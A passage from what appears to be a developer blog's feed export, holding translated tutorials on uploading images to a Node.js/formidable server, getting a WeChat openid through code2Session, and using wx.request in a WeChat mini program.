class="attr">filePath</span>: tempFilePaths,</span><br><span class="line">        <span class="attr">name</span>: <span class="string">'file'</span>,</span><br><span class="line">        <span 
class="attr">formData</span>:{</span><br><span class="line">          <span class="string">'roomID'</span>: roomID</span><br><span class="line">        },</span><br><span class="line">        <span class="attr">header</span>: {</span><br><span class="line"></span><br><span class="line">          <span class="string">'content-type'</span>: <span class="string">'multipart/form-data'</span></span><br><span class="line"></span><br><span class="line">        },</span><br><span class="line">        <span class="attr">success</span>: <span class="keyword">function</span> (<span class="params">res</span>) {</span><br><span class="line">          <span class="keyword">var</span> data = res.<span class="property">data</span>;</span><br><span class="line">          <span class="variable language_">console</span>.<span class="title function_">log</span>(data);</span><br><span class="line">        },</span><br><span class="line">        <span class="attr">fail</span>: <span class="keyword">function</span> (<span class="params">e</span>) {</span><br><span class="line">          <span class="variable language_">console</span>.<span class="title function_">log</span>(e.<span class="property">stack</span>);</span><br><span class="line">        }</span><br><span class="line">      })</span><br><span class="line">    }</span><br><span class="line">  })</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>There is really not much to say about the front-end code…… If you have questions, message me or leave a comment.</p><hr><h2 id="后端部分"><a href="#后端部分" class="headerlink" title="后端部分"></a>Back end</h2><p>The back end is the really important part.</p><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span 
class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">var</span> express = <span class="built_in">require</span>(<span class="string">"express"</span>);</span><br><span class="line"><span class="keyword">var</span> formidable = <span class="built_in">require</span>(<span class="string">"formidable"</span>);</span><br><span class="line"><span class="keyword">var</span> path = <span class="built_in">require</span>(<span class="string">"path"</span>)</span><br><span class="line"><span class="keyword">var</span> fs = <span class="built_in">require</span>(<span class="string">"fs"</span>)</span><br><span class="line"><span class="keyword">var</span> app = <span class="title function_">express</span>();</span><br><span class="line"></span><br><span class="line">app.<span class="title function_">post</span>(<span class="string">"/img"</span>, <span class="function">(<span class="params">req, res</span>) =></span> {</span><br><span class="line">    <span class="keyword">var</span> form = <span class="keyword">new</span> formidable.<span class="title class_">IncomingForm</span>();<span class="comment">//handles both form fields and file uploads</span></span><br><span 
class="line">    <span class="comment">//set the upload folder/path; __dirname is a constant holding the current directory</span></span><br><span class="line">    <span class="keyword">let</span> uploadDir = path.<span class="title function_">join</span>(<span class="string">"../img/"</span>);</span><br><span class="line">    form.<span class="property">uploadDir</span> = uploadDir;<span class="comment">// temporary storage path for uploaded files; defaults to os.tmpdir() when not set</span></span><br><span class="line">    form.<span class="property">encoding</span> = <span class="string">'utf-8'</span>; <span class="comment">// decode the request fields as utf-8</span></span><br><span class="line">    form.<span class="property">keepExtensions</span> = <span class="literal">true</span>; <span class="comment">// by default the upload is saved to a file without an extension; true keeps the extension</span></span><br><span class="line">    form.<span class="property">maxFieldsSize</span> = <span class="number">2</span> * <span class="number">1024</span> * <span class="number">1024</span>; <span class="comment">//size limit of 2 MB (maxFieldsSize applies to the non-file form fields)</span></span><br><span class="line">    form.<span class="title function_">parse</span>(req, <span class="function">(<span class="params">err, fields, files</span>) =></span> {</span><br><span class="line">        <span class="keyword">var</span> roomID = path.<span class="title function_">basename</span>(<span class="title class_">String</span>(fields.<span class="property">roomID</span>)); <span class="comment">//roomID comes from the client: keep only the final path component so it cannot point outside /home/ubuntu/img/</span></span><br><span class="line">        <span class="keyword">let</span> oldPath = files.<span class="property">file</span>.<span class="property">path</span>; <span class="comment">//this is the local path of the uploaded image</span></span><br><span class="line">        <span class="keyword">let</span> newPath = <span class="string">'/home/ubuntu/img/'</span> + roomID + <span class="string">'.jpg'</span>;</span><br><span class="line">        fs.<span class="title function_">rename</span>(oldPath, newPath, <span class="keyword">function</span> (<span class="params">err</span>) {</span><br><span class="line">            <span class="keyword">if</span> (!err) {</span><br><span class="line">                <span class="variable language_">console</span>.<span class="title function_">log</span>(newPath);</span><br><span 
class="line">            }</span><br><span class="line">        })</span><br><span class="line">        res.<span class="title function_">send</span>({</span><br><span class="line">            <span class="attr">code</span>: <span class="number">200</span>,</span><br><span class="line">            <span class="attr">msg</span>: <span class="string">'/img/'</span> + newPath</span><br><span class="line">        });</span><br><span class="line"></span><br><span class="line">    })</span><br><span class="line">})</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">var</span> server = app.<span class="title function_">listen</span>(<span class="number">6666</span>, <span class="keyword">function</span> (<span class="params"></span>) {</span><br><span class="line"></span><br><span class="line">    <span class="keyword">var</span> host = server.<span class="title function_">address</span>().<span class="property">address</span></span><br><span class="line">    <span class="keyword">var</span> port = server.<span class="title function_">address</span>().<span class="property">port</span></span><br><span class="line"></span><br><span class="line">    <span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="string">"应用实例,访问地址为 http://%s:%s"</span>, host, port)</span><br><span class="line">})</span><br></pre></td></tr></table></figure><p>At first I thought this image upload would be simple (and it really isn't hard), but then I ran into problems because I was unfamiliar with node.js, and with formidable in particular. I started with back-end code found online that contained almost nothing, so naturally it failed…… Later I found another piece of code which, after my own changes, already did what was needed, except that the path settings were wrong. I should have studied formidable at that point; I relied too much on code found online. Then my team leader found an <a href="https://cloud.tencent.com/developer/article/1467373">article</a> and fixed the path problem before passing it to me; when I saw that the code was almost the same as mine I didn't know whether to laugh or cry. I had been only a small step from success, so learning the language carefully really matters, and only by understanding the module well can you spot subtle mistakes. I still haven't studied formidable in depth, but I understand nearly all of the code. The commented parts are easy to follow, but passing values needs attention.<br><strong>fields</strong> and 
<strong>files</strong><br>Note that in the node code the path is obtained from files.<br>The roomID value passed in formData by the mini program front end is obtained from fields.<br>After solving the path problem I searched online for how node receives formData values, but there is little written about formData in mini programs. I found some information in the WeChat developer community; some people suggested using a plugin, but they all looked complicated. Someone in the comments also mentioned that the mini program's formData is not strict; in any case it has some quirks. In the end I looked for the formData value the same way I had found the path, printing with console.log many times, and finally found roomID in fields. I won't go into how to use the passed value.<br>The article linked at the end of this post has code that keeps the image's original extension, but that requires getting the extension first, from files.file.type, which gives the image extension.</p><p>Renaming the image:</p><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">fs.<span class="title function_">rename</span>(oldPath, newPath, <span class="keyword">function</span> (<span class="params">err</span>) {</span><br><span class="line">    <span class="keyword">if</span> (!err) {</span><br><span class="line">        <span class="variable language_">console</span>.<span class="title function_">log</span>(newPath);</span><br><span class="line">    }</span><br><span class="line">})</span><br></pre></td></tr></table></figure><p>One last, especially important point: the <strong>path</strong><br>Look at how the new image name newPath is put together:<br> <code>let newPath = '/home/ubuntu/img/' + roomID + '.jpg';</code></p><p>The image is finally stored on the server under the name roomID.jpg;</p><p>if roomID is 101, the image is named 101.jpg;</p><p>the path in front of roomID is the image's location on the server.</p><p>See my other <a href="https://editor.csdn.net/md/?articleId=105526742">blog post</a>; the screenshots in its WinSCP section show the path where my images are stored.</p><p>References:<br><a href="https://www.cnblogs.com/JobsOfferings/p/JonsOfferings_node_imgUp.html#4549239">https://www.cnblogs.com/JobsOfferings/p/JonsOfferings_node_imgUp.html#4549239</a></p><p><a href="https://www.cnblogs.com/xiaofeixiang/p/5140673.html">https://www.cnblogs.com/xiaofeixiang/p/5140673.html</a></p>]]></content>
<summary type="html"><h2 id="前端部分"><a href="#前端部分" class="headerlink" title="前端部分"></a>Front end</h2><figure class="highlight javascript"><table><tr><td class="gutter</summary>
<category term="WeChat Applet" scheme="http://example.com/categories/WeChat-Applet/"/>
<category term="solution" scheme="http://example.com/tags/solution/"/>
<category term="nodejs" scheme="http://example.com/tags/nodejs/"/>
</entry>
<entry>
<title>Getting the openid</title>
<link href="http://example.com/2020/04/15/%E5%BE%AE%E4%BF%A1%E5%B0%8F%E7%A8%8B%E5%BA%8F%E2%80%94%E2%80%94%E8%8E%B7%E5%8F%96openid%EF%BC%8C%E5%90%8E%E7%AB%AF%E8%AF%AD%E8%A8%80%EF%BC%9Anode.js/"/>
<id>http://example.com/2020/04/15/%E5%BE%AE%E4%BF%A1%E5%B0%8F%E7%A8%8B%E5%BA%8F%E2%80%94%E2%80%94%E8%8E%B7%E5%8F%96openid%EF%BC%8C%E5%90%8E%E7%AB%AF%E8%AF%AD%E8%A8%80%EF%BC%9Anode.js/</id>
<published>2020-04-15T05:33:13.000Z</published>
<updated>2022-03-18T06:03:46.021Z</updated>
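<content type="html"><![CDATA[<h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>Preface</h2><p>To be honest, getting the OpenID is the part of building this mini program that has taken me the most time and effort so far, so I want to explain it in some detail. I finished it last week and then moved on to other features, so I did not keep many screenshots of the errors, and I have already forgotten some of it... QAQ.<br>In short: get into the habit of taking notes as you go!</p><hr><h2 id="OpenID和unionID"><a href="#OpenID和unionID" class="headerlink" title="OpenID和unionID"></a>OpenID and unionID</h2><p>An OpenID is a unique identifier for an ordinary user of an official account, valid only for the current application. Official accounts and mini programs are both applications, so the openid differs from one official account or mini program to another, but within a single application it never changes.<br>The best unique identifier is really the unionID: its value is the same no matter how many applications there are, so it is clearly the best way to identify a user across several applications. The first requirement for getting a unionID, however, is binding to the WeChat Open Platform.<img src="https://img-blog.csdnimg.cn/20200415081438498.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"><br>I spent a long time trying to bind to the WeChat Open Platform without success, possibly because my mini program account was not verified. I later learned that after binding you also have to pay for verification (not the mini program account verification) before you can get it. That seemed like a hassle to me, and we only have one mini program, so all things considered OpenID is enough.<br>The official documentation on getting the unionID is fairly detailed: <a href="https://developers.weixin.qq.com/doc/offiaccount/User_Management/Get_users_basic_information_UnionID.html#UinonId">https://developers.weixin.qq.com/doc/offiaccount/User_Management/Get_users_basic_information_UnionID.html#UinonId</a></p><hr><h2 id="配置问题"><a href="#配置问题" class="headerlink" title="配置问题"></a>Configuration issues</h2><p>Configuration was the most frustrating and also the most important part of solving this. A programmer cannot know only front-end and back-end languages; you also need to know things like site configuration. Later I will describe how painful it is not to!</p><ol><li>First, configure a legal domain on the WeChat Official Accounts Platform. I won't say much about this, and I won't teach domain registration or installing an SSL certificate for the domain. Only after the legal domain is configured can you do the later steps.</li><li>Set the port. The mini program's default port is 443, so in the front-end js the request url can simply be https://"your domain", with no port number after it. I think it is worth setting up a few ports for the domain, because when debugging locally a port may well be in use, and then you can switch to another port you set up earlier.[^1]</li><li>Since a server is involved, you need to upload the back-end code to the server and run your back-end file there.<br> ①: Recommended software for securely copying files between the local and a remote computer (local to server): WinSCP<br>When WinSCP opens you will see this screen<img src="https://img-blog.csdnimg.cn/20200415094634411.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"><br>Host name: the server's IP<br>User name: the server account<br>Password: the server password<br>Right-click a file in the left pane to upload; folders and files both work.<img 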
src="https://img-blog.csdnimg.cn/20200415095241747.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"><br><img src="https://img-blog.csdnimg.cn/20200415095257760.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"><br>②: Recommended secure terminal emulator: Xshell<br>Xshell lets you access remote servers running other operating systems from Windows, which makes it a good way to control a remote terminal; in other words, you run Linux commands from Windows. First create a new session<br><img src="https://img-blog.csdnimg.cn/2020041510005655.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"><br>Step 3: enter the server account<img src="https://img-blog.csdnimg.cn/20200415112355283.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"><br>Step 4: enter the server password<img src="https://img-blog.csdnimg.cn/20200415112402601.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"><br>Step 5: run the node command; cd to wherever the back-end js file is and run it there<br>Of course, the node.js environment has to be set up on the server first; things like express can be installed with npm in the screen below (where you can also run node commands)<img src="https://img-blog.csdnimg.cn/20200415100720965.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"><br>Because I am part of a small team, some things are not done by me. Setting up the server environment should really be my job, but I do not know much about servers; even running the back-end js file on the server is something I only started doing in order to get the openid. I am also one of the slower members of the team, so my team leader helped me with quite a lot, including the server environment and the port setup. On the configuration side I am writing down what I know; what I do not know I can only mention in passing, and the rest is up to you.</li></ol><hr><p>[^1]: I do not know how to set up ports myself; my team leader did it through the BT Panel (宝塔). You can go and learn it; the panel is reached at http://"your domain":8888<br> The BT Panel's default port is 8888, and the address must start with http, not https.<br> Here is how to <strong>change the port</strong>:<br> <img 
src="https://img-blog.csdnimg.cn/20200415111709177.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"><br>①: You have to log in when you first open the BT Panel, as in the screenshot above:<br>Getting the default account and password:<img src="https://img-blog.csdnimg.cn/20200415112545667.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"><br>②: Under Menu > Security, look at the unused port numbers<br>I do not know how to set up a port number, haha<br><img src="https://img-blog.csdnimg.cn/2020041512365299.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"><br>③: Under Menu > Website > Settings > Config file, find location /<br>Change the port number after the domain name; mine is 6666. To use a different one, pick one of the unused ports.<br><img src="https://img-blog.csdnimg.cn/20200415124038725.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"><br>④: Under Menu > App Store > Nginx > Settings, choose Restart<br>Installing Nginx in the BT Panel is easy: find nginx in the App Store, click Install, and wait for it to finish<br><img src="https://img-blog.csdnimg.cn/20200415124410532.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"></p><h2 id="前端部分"><a href="#前端部分" class="headerlink" title="前端部分"></a>Front end</h2><figure class="highlight javascript"><table><tr><td class="code"><pre><span class="line"><span class="comment">//.wxml</span></span><br><span class="line"><view <span class="keyword">class</span>=<span class="string">"tui-picker-content"</span>></span><br><span class="line"><span class="language-xml"><span class="tag"><<span class="name">button</span> <span class="attr">bindtap</span>=<span 
class="string">"open"</span>></span>确认身份<span class="tag"></<span class="name">button</span>></span></span></span><br><span class="line"></view></span><br></pre></td></tr></table></figure><figure class="highlight javascript"><table><tr><td class="code"><pre><span class="line"><span class="comment">//.js</span></span><br><span class="line">wx.<span class="title function_">login</span>({<span class="comment">//call wx.login() first to get the temporary login credential code</span></span><br><span class="line"> <span class="attr">success</span>: <span class="function"><span class="params">res</span> =></span>{</span><br><span class="line"> <span class="keyword">const</span> code = res.<span class="property">code</span> <span class="comment">//the user's temporary login credential code</span></span><br><span class="line"> wx.<span class="title function_">request</span>({<span class="comment">//send the request</span></span><br><span class="line"> <span class="attr">url</span>: <span class="string">"https://“你的域名”?code="</span>+code,<span class="comment">//your domain, with the code attached</span></span><br><span class="line"> <span class="attr">success</span>: <span class="function">(<span class="params">res</span>) =></span>{<span class="comment">//receives the OpenID and session_key that node requested</span></span><br><span class="line"> <span class="keyword">const</span> openid = res.<span class="property">data</span>.<span class="property">openid</span></span><br><span class="line"> wx.<span class="title function_">setStorageSync</span>(<span class="string">"openid"</span>, 
openid)</span><br><span class="line"> }</span><br><span class="line"> })</span><br><span class="line"> },</span><br><span class="line"> <span class="attr">fail</span>: <span class="variable language_">console</span>.<span class="property">log</span></span><br><span class="line"> })</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>Yes, you read that right: the front end is about the same as the official documentation, with hardly anything more.</p><hr><h2 id="后端部分"><a href="#后端部分" class="headerlink" title="后端部分"></a>Back end</h2><figure class="highlight javascript"><table><tr><td class="code"><pre><span class="line"><span class="keyword">const</span> express = <span class="built_in">require</span>(<span class="string">'express'</span>);</span><br><span class="line"><span class="keyword">const</span> request = <span class="built_in">require</span>(<span class="string">'request'</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">const</span> app = <span class="title function_">express</span>()</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span 
class="keyword">const</span> appid = <span class="string">"wx123123123"</span> <span class="comment">//the developer's appid</span></span><br><span class="line"><span class="keyword">const</span> appsecret = <span class="string">"123123123123"</span> <span class="comment">//the developer's appsecret; log in to the mini program admin platform to view it</span></span><br><span class="line"></span><br><span class="line">app.<span class="title function_">use</span>(<span class="string">'/login'</span>, <span class="function">(<span class="params">req,res</span>)=></span>{</span><br><span class="line"> <span class="keyword">const</span> code = req.<span class="property">query</span>.<span class="property">code</span> <span class="comment">//the code passed in</span></span><br><span class="line"> <span class="comment">//call the auth.code2Session API to exchange the code for the user's unique identifier OpenID and the session key session_key; the code is URL-encoded so it cannot add extra query parameters</span></span><br><span class="line"> <span class="keyword">const</span> url = <span class="string">`https://api.weixin.qq.com/sns/jscode2session?appid=<span class="subst">${appid}</span>&secret=<span class="subst">${appsecret}</span>&js_code=<span class="subst">${encodeURIComponent(code)}</span>&grant_type=authorization_code`</span></span><br><span class="line"></span><br><span class="line"> <span class="title function_">request</span>(url, <span class="function">(<span class="params">err,response,body</span>)=></span>{ <span class="comment">//named response so it does not shadow the Express res</span></span><br><span class="line"> <span class="keyword">if</span> (err) <span class="keyword">return</span> res.<span class="title function_">status</span>(<span class="number">502</span>).<span class="title function_">end</span>() <span class="comment">//the request to WeChat failed</span></span><br><span class="line"> res.<span class="title function_">send</span>(body) <span class="comment">//return the OpenID and session_key to the mini program page's js file</span></span><br><span class="line"> })</span><br><span class="line">})</span><br><span class="line"><span class="keyword">var</span> server = app.<span class="title function_">listen</span>(<span class="number">6666</span>, <span class="keyword">function</span> (<span class="params"></span>) {</span><br><span class="line"></span><br><span class="line"> <span class="keyword">var</span> host = server.<span class="title function_">address</span>().<span class="property">address</span></span><br><span 
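class="line"> <span class="keyword">var</span> port = server.<span class="title function_">address</span>().<span class="property">port</span></span><br><span class="line"></span><br><span class="line"> <span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="string">"应用实例,访问地址为 http://%s:%s"</span>, host, port)</span><br><span class="line">})</span><br></pre></td></tr></table></figure><p>There is not much back-end code either; it is about the same as what you find elsewhere, and just as simple.</p><p>One thing to watch: the body sent back here contains session_key along with the openid. WeChat's documentation says the developer server should not send the session key to the mini program, and the front end above only reads openid.</p><hr><p>The problem that bothered me for days really is this simple! So why did it take so many days?<br>The dreaded configuration problem!!!<br>My code was actually finished after the first two days of searching, but it kept reporting this error:<img src="https://img-blog.csdnimg.cn/20200415131231566.jpg" alt="在这里插入图片描述"><br>You can ignore the warning that the tool has not verified the legal domain. I found this error screenshot in my chat history with my team leader; I did not save any of the earlier ones...<br>I remember there was also a 404 not found error, but it came up less often than this one.<br>This error was a port problem. I had never set a port, and the mini program default is 443, but while we were working on it my team leader told me 443 was already in use: Nginx was occupying port 443. He then changed the port in the BT Panel (in essence, requests sent to port 443 are forwarded by nginx to port 6666 over http) and that solved it... At first I thought the code was wrong and stayed up late for two days looking; in the end the problem was not in the code at all... sigh...</p><hr><p><strong>Summary</strong>: The code is not hard; what matters most is configuration. A legal domain and the right port: once the configuration is sorted out, the rest is not much of a problem. I hope anyone in the same situation finds this post, Emm...</p><p>If you have other questions of this kind or find mistakes in the article, feel free to message me or comment.</p><hr><p>The code in this post is based on this blog post<br><a href="https://blog.csdn.net/qq_41614928/article/details/90408891?depth_1-utm_source=distribute.pc_relevant.none-task-blog-BlogCommendFromBaidu-2&utm_source=distribute.pc_relevant.none-task-blog-BlogCommendFromBaidu-2">https://blog.csdn.net/qq_41614928/article/details/90408891?depth_1-utm_source=distribute.pc_relevant.none-task-blog-BlogCommendFromBaidu-2&utm_source=distribute.pc_relevant.none-task-blog-BlogCommendFromBaidu-2</a></p>]]></content>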
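<summary type="html"><h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>Preface</h2><p>To be honest, getting the OpenID is the part of building this mini program that has taken me the most time and effort so far, so I want to explain it in some detail. Because I finished this last week, and afterwards I</summary>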
<category term="WeChat Applet" scheme="http://example.com/categories/WeChat-Applet/"/>
<category term="solution" scheme="http://example.com/tags/solution/"/>
<category term="nodejs" scheme="http://example.com/tags/nodejs/"/>
</entry>
<entry>
<title>wx:request requests & writing an API endpoint in Node.js</title>
<link href="http://example.com/2020/03/21/%E5%BE%AE%E4%BF%A1%E5%B0%8F%E7%A8%8B%E5%BA%8F%E2%80%94%E2%80%94wx_request%E8%AF%B7%E6%B1%82&Node.js%E7%BC%96%E5%86%99api%E6%8E%A5%E5%8F%A3/"/>
<id>http://example.com/2020/03/21/%E5%BE%AE%E4%BF%A1%E5%B0%8F%E7%A8%8B%E5%BA%8F%E2%80%94%E2%80%94wx_request%E8%AF%B7%E6%B1%82&Node.js%E7%BC%96%E5%86%99api%E6%8E%A5%E5%8F%A3/</id>
<published>2020-03-21T01:08:36.000Z</published>
<updated>2022-03-18T06:03:46.021Z</updated>
<content type="html"><![CDATA[<h2 id="简析wx-request"><a href="#简析wx-request" class="headerlink" title="简析wx.request"></a>A quick look at wx.request</h2><h3 id="url"><a href="#url" class="headerlink" title="url"></a>url</h3><figure class="highlight javascript"><table><tr><td class="code"><pre><span class="line"><span class="attr">url</span>:<span class="string">'开发者服务器接口地址'</span> <span class="comment">//the developer server's API address</span></span><br></pre></td></tr></table></figure><p>For the API address, use the <strong>legal domain bound to</strong> your mini program; local testing is covered in the extras at the bottom of the article.</p><hr><h3 id="data"><a href="#data" class="headerlink" title="data"></a>data</h3><p>Making an https request to a url works the same way as opening a web address in a browser. Opening an address in the browser actually sends an https request to the server that hosts that domain.<br>The format is:</p><figure class="highlight javascript"><table><tr><td class="code"><pre><span class="line"><span class="attr">url</span>:<span class="string">'http://xxxxxxx.com'</span>, <span class="comment">//this address is made up</span></span><br><span class="line"> <span class="attr">data</span>: {</span><br><span class="line"> <span class="attr">id</span>: <span class="string">'1'</span> ,</span><br><span class="line"> <span class="attr">dateTime</span>: <span class="string">'2020-3-20'</span></span><br><span class="line"> }</span><br></pre></td></tr></table></figure><p>or</p><figure class="highlight javascript"><table><tr><td class="code"><pre><span class="line"><span class="attr">url</span>:<span class="string">'http://xxxxxxx.com?id=1&dateTime=2020-3-20'</span>,</span><br></pre></td></tr></table></figure><p>The two mean the same thing: the values in data are the url parameters used by wx.request, that is, the parameters after the question mark.</p><ul><li>About data: the data finally sent to the server is of type String; if the data passed in is not a String, it is converted to one. For details, see the mini program's <a 
href="https://developers.weixin.qq.com/miniprogram/dev/api/network/request/wx.request.html">official documentation</a>; I won't copy and paste it here.</li></ul><hr><h3 id="header"><a href="#header" class="headerlink" title="header"></a>header</h3><p>The header of an https request is the header information sent to the url's server along with the request made after the user opens the mini program. In other words, when we request an address, a "request header" travels to the server with it; once the request has been handled, the server returns the requested information to the user over the http protocol, and a "response header" comes back with it. The user simply never notices or sees either header.<br>The format is:</p><figure class="highlight javascript"><table><tr><td class="code"><pre><span class="line"><span class="attr">header</span>: {</span><br><span class="line"> <span class="string">'content-type'</span>: <span class="string">'application/json'</span></span><br><span class="line"> },</span><br></pre></td></tr></table></figure><ul><li>One thing to note: Referer cannot be set in header, and <code>content-type</code> defaults to <code>application/json</code>, so writing this request header makes no difference...</li></ul><hr><h3 id="success"><a href="#success" class="headerlink" title="success"></a>success</h3><p>When an https request succeeds, the mini program automatically calls this function, which returns the success information. The function receives the data returned by the developer server (usually in json format), and that data is <strong>what we render on the mini program page</strong>. (Finally on topic...)<br>Example:</p><figure class="highlight javascript"><table><tr><td class="code"><pre><span class="line"><span class="comment">//index.wxml</span></span><br><span class="line"><view <span class="keyword">class</span>=<span class="string">"container"</span>></span><br><span class="line"> <span class="language-xml"><span class="tag"><<span class="name">block</span> <span class="attr">wx:for</span>=<span class="string">"{{contents}}"</span>></span></span></span><br><span class="line"><span class="language-xml"> <span class="tag"><<span 
class="name">view</span>></span></span></span><br><span class="line"><span class="language-xml"> <span class="tag"><<span class="name">text</span>></span>{{item.id}}---{{item.behavior}}---{{item.dateTime}}<span class="tag"></<span class="name">text</span>></span></span></span><br><span class="line"><span class="language-xml"> <span class="tag"></<span class="name">view</span>></span></span></span><br><span class="line"><span class="language-xml"> <span class="tag"></<span class="name">block</span>></span></span></span><br><span class="line"></view></span><br></pre></td></tr></table></figure><figure class="highlight javascript"><table><tr><td class="code"><pre><span class="line"><span class="comment">//index.js</span></span><br><span class="line"><span class="title class_">Page</span>({</span><br><span class="line"> <span class="attr">data</span>: {</span><br><span class="line"> <span class="attr">contents</span>: {}</span><br><span class="line"> },</span><br><span class="line"> <span class="attr">onLoad</span>: <span class="keyword">function</span> (<span 
class="params">options</span>) {</span><br><span class="line"> <span class="keyword">var</span> that = <span class="variable language_">this</span></span><br><span class="line"> wx.<span class="title function_">request</span>({</span><br><span class="line"> <span class="attr">url</span>: <span class="string">'https://xxxxxxx.com'</span>,</span><br><span class="line"> <span class="attr">data</span>: {},</span><br><span class="line"> <span class="attr">method</span>: <span class="string">'GET'</span>,</span><br><span class="line"> <span class="attr">success</span>: <span class="keyword">function</span> (<span class="params">res</span>) {</span><br><span class="line"> <span class="comment">// success</span></span><br><span class="line"> that.<span class="title function_">setData</span>({</span><br><span class="line"> <span class="attr">contents</span>: res.<span class="property">data</span></span><br><span class="line"> })</span><br><span class="line"> <span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="string">'require success'</span>, res)</span><br><span class="line"> },</span><br><span class="line"> <span class="attr">fail</span>: <span class="keyword">function</span> (<span class="params">err</span>) {</span><br><span class="line"> <span class="comment">// fail</span></span><br><span class="line"> <span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="string">'require fail'</span> ,err)</span><br><span class="line"> },</span><br><span class="line"> <span class="attr">complete</span>: <span class="keyword">function</span> (<span class="params"></span>) {</span><br><span class="line"> <span class="comment">// complete</span></span><br><span class="line"> }</span><br><span class="line"> })</span><br><span class="line"> }</span><br><span class="line">})</span><br></pre></td></tr></table></figure><p>After a successful request, the data received is the res parameter of the success function; printed, it looks like this:<br><img 
